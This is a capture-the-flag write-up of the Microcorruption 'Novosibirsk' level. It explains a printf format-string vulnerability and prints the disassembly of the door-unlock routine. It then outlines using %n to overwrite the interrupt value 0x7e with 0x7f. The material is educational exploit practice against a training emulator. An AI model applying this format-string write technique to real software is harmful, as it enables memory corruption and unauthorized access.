Microcorruption: Novosibirsk

Summary

This is a write-up of my solution to the Microcorruption CTF challenge "Novosibirsk" (LOCKIT PRO r c.02).

In this challenge, we're given a hint right from the start:

OVERVIEW
    - This lock is attached the the LockIT Pro HSM-2.
    - We have added features from b.03 to the new hardware.

If you recall from the b.03 challenge (Addis Ababa), we had to exploit a printf() vulnerability using %n to write to an arbitrary memory location. Let's see if we need to do something similar in this challenge...

Inside main(), we can see that printf() is called a few times as well as strcpy(). Let's try entering AB%x and see what the program outputs.

We get back AB4241 — which means our input was placed into printf(). Recall from Addis Ababa that we were able to use %n to write at arbitrary locations in memory.

Let's check out the program again and figure out where we can write to in order to unlock the door. Here's the code for conditional_unlock_door():

44b0 <conditional_unlock_door>
44b0:  0412           push	r4
44b2:  0441           mov	sp, r4
44b4:  2453           incd	r4
44b6:  2183           decd	sp
44b8:  c443 fcff      mov.b	#0x0, -0x4(r4)
44bc:  3e40 fcff      mov	#0xfffc, r14
44c0:  0e54           add	r4, r14
44c2:  0e12           push	r14
44c4:  0f12           push	r15
44c6:  3012 7e00      push	#0x7e
44ca:  b012 3645      call	#0x4536 <INT>
44ce:  5f44 fcff      mov.b	-0x4(r4), r15
44d2:  8f11           sxt	r15
44d4:  3152           add	#0x8, sp
44d6:  3441           pop	r4
44d8:  3041           ret

From Whitehorse we learned that 0x7f is required to be pushed to the stack (before the interrupt call) in order for the door to unlock. However we can see here that 0x7e gets pushed to the stack instead. Thankfully, we can use the format %n, which will write the number of bytes read before it, to a location of our choosing. More specifically, let's write 0x7f to address 44c8 by using 127 (0x7f) characters and a %n...